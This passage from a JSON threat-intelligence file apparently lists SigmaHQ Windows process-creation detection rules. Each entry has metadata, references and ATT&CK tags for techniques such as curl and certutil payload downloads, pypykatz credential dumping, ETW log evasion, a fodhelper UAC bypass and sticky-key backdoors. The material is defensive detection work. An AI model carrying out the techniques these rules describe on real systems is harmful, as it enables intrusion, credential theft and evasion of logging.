"attack.execution", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", "value": "Potential SquiblyTwo Technique Execution" }, { "description": "Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.\n", "meta": { "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2019-03-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_etw_trace_evasion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://abuse.io/lockergoga.txt", "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1562.006", "car.2016-04-002" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "value": "ETW Trace Evasion Activity" }, { "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", "meta": { "author": "frack113", "creation_date": "2022-08-20", "falsepositive": [ "Legitimate use by users" ], "filename": "proc_creation_win_dirlister_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", "value": "DirLister Execution" }, { "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", "meta": { "author": "frack113", "creation_date": "2021-12-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_group.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": 
"windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_group.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", "value": "Local Groups Reconnaissance Via Wmic.EXE" }, { "description": "Detects the execution of a renamed office binary", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_office_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://infosec.exchange/@sbousseaden/109542254124022664", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "0b0cd537-fc77-4e6e-a973-e53495c1083d", "value": "Renamed Office Binary Execution" }, { "description": "Detects a Windows command line executable started from MMC", "meta": { "author": "Karneades, Swisscom CSIRT", "creation_date": "2019-08-05", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_mmc_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", 
"tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", "value": "MMC Spawning Windows Shell" }, { "description": "Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2024-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_pingcastle.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8", "https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699", "https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1", "https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680", "https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/vletoux/pingcastle", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_pingcastle.yml" ], "tags": [ "attack.reconnaissance", "attack.t1595" ] }, "related": [ { "dest-uuid": "67073dde-d720-45ae-83da-b12d5e73ca3b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1cb4ab6-ac31-43f4-adf1-d9d08957419c", "value": "PUA - PingCastle Execution" }, { "description": "Detects a suspicious process spawning from an Outlook process.", "meta": { "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye 
Team", "creation_date": "2022-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_outlook_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", "value": "Suspicious Outlook Child Process" }, { "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) 
even if the files have been renamed", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-27", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", "https://github.com/cube0x0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml" ], "tags": [ "attack.credential-access", "attack.t1588.002", "attack.t1003" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", "value": "Hacktool Execution - PE Metadata" }, { "description": "Detects a code page switch in command line or batch scripts to a rare language", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2019-10-14", "falsepositive": [ "Administrative activity (adjust code pages according to your organization's region)" ], "filename": "proc_creation_win_chcp_codepage_switch.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", "https://twitter.com/cglyer/status/1183756892952248325", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml" ], "tags": [ "attack.t1036", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7942406-33dd-4377-a564-0f62db0593a3", "value": "Suspicious CodePage Switch Via CHCP" }, { "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate use of fodhelper.exe utility by legitimate user" ], "filename": "proc_creation_win_uac_bypass_fodhelper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "value": "Bypass UAC via Fodhelper.exe" }, { "description": "Detects creation of a scheduled task with a GUID like name", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-31", "falsepositive": [ "Legitimate software naming their tasks as GUIDs" ], "filename": "proc_creation_win_schtasks_guid_task_name.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_guid_task_name.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "value": "Suspicious Scheduled Task Name As GUID" }, { "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", "meta": { "author": "frack113", "creation_date": "2022-01-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_pypykatz.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", "https://github.com/skelsec/pypykatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pypykatz.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", "value": "HackTool - Pypykatz Credentials Dumping Activity" }, { "description": "Detects the PowerShell command lines with special characters", "meta": { "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "creation_date": "2020-10-15", "falsepositive": [ "Amazon SSM Document Worker", "Windows Defender ATP" ], "filename": "proc_creation_win_powershell_cmdline_special_characters.yml", "level": 
"high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1027", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "value": "Potential PowerShell Command Line Obfuscation" }, { "description": "Detects execution of regsvr32 where the DLL is located in a highly suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-26", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_regsvr32_susp_exec_path_2.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "327ff235-94eb-4f06-b9de-aaee571324be", "value": "Regsvr32 Execution From Highly Suspicious Location" }, { "description": "Detects usage of nmap/zenmap. 
Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Legitimate administrator activity" ], "filename": "proc_creation_win_pua_nmap_zenmap.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", "https://nmap.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nmap_zenmap.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", "value": "PUA - Nmap/Zenmap Execution" }, { "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", "meta": { "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-13", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_lolbin_manage_bde.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", "https://twitter.com/bohops/status/980659399495741441", "https://twitter.com/JohnLaTwC/status/1223292479270600706", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml" ], "tags": [ "attack.defense-evasion", 
"attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", "value": "Potential Manage-bde.wsf Abuse To Proxy Execution" }, { "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", "meta": { "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "creation_date": "2019-09-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.008" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae215552-081e-44c7-805f-be16f975c8a2", "value": "Suspicious Debugger Registration Cmdline" }, { "description": "Detects actions that clear the local ShimCache and remove forensic evidence", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-02-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b0524451-19af-4efa-a46f-562a977f792e", "value": "ShimCache Flush" }, { "description": "Detects commands that temporarily turn off Volume Snapshots", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-01-28", "falsepositive": [ "Legitimate administration" ], "filename": "proc_creation_win_reg_volsnap_disable.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1354766164166115331", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_volsnap_disable.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "value": "Disabled Volume Snapshots" }, { "description": "Detects the execution of \"DXCap.EXE\" with the \"-c\" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. 
This can be abused to potentially bypass application whitelisting.\n", "meta": { "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-26", "falsepositive": [ "Legitimate execution of dxcap.exe by legitimate user" ], "filename": "proc_creation_win_dxcap_arbitrary_binary_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", "https://twitter.com/harr0ey/status/992008180904419328", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dxcap_arbitrary_binary_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60f16a96-db70-42eb-8f76-16763e333590", "value": "New Capture Session Launched Via DXCap.EXE" }, { "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", "meta": { "author": "Eli Salem, Sander Wiebing, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regini_ads.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" ], "tags": [ "attack.t1112", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "value": "Suspicious Registry Modification From ADS Via Regini.EXE" }, { "description": "Detects a suspicious command line execution that includes a URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2019-01-16", "falsepositive": [ "High" ], "filename": "proc_creation_win_cmd_http_appdata.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml" ], "tags": [ "attack.execution", "attack.command-and-control", "attack.t1059.003", "attack.t1059.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", "value": "Command Line Execution with Suspicious URL and AppData Strings" }, { "description": "Detects usage of the \"Add-AppxPackage\" or its alias \"Add-AppPackage\" to install unsigned AppX packages", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-31", "falsepositive": [ "Installation of unsigned 
packages for testing purposes" ], "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package", "https://twitter.com/WindowsDocs/status/1620078135080325122", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion" ] }, "uuid": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", "value": "Unsigned AppX Installation Attempt Using Add-AppxPackage" }, { "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", "meta": { "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-01-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "value": "Curl Download And Execute Combination" }, { "description": "Detects potential \"ShellDispatch.dll\" functionality abuse to execute arbitrary binaries via 
\"ShellExecute\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-20", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rundll32_shelldispatch_potential_abuse.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml" ], "tags": [ "attack.execution", "attack.defense-evasion" ] }, "uuid": "82343930-652f-43f5-ab70-2ee9fdd6d5e9", "value": "Potential ShellDispatch.DLL Functionality Abuse" }, { "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_download_direct_ip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/_JohnHammond/status/1708910264261980634", "https://twitter.com/egre55/status/1087685529016193025", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", 
"value": "Suspicious File Downloaded From Direct IP Via Certutil.EXE" }, { "description": "Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wscript_cscript_uncommon_extension_exec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99b7460d-c9f1-40d7-a316-1f36f61d52ee", "value": "Cscript/Wscript Uncommon Script Extension Execution" }, { "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", "meta": { "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "creation_date": "2019-06-15", "falsepositive": [ "Custom applications use renamed binaries adding slight change to binary name. 
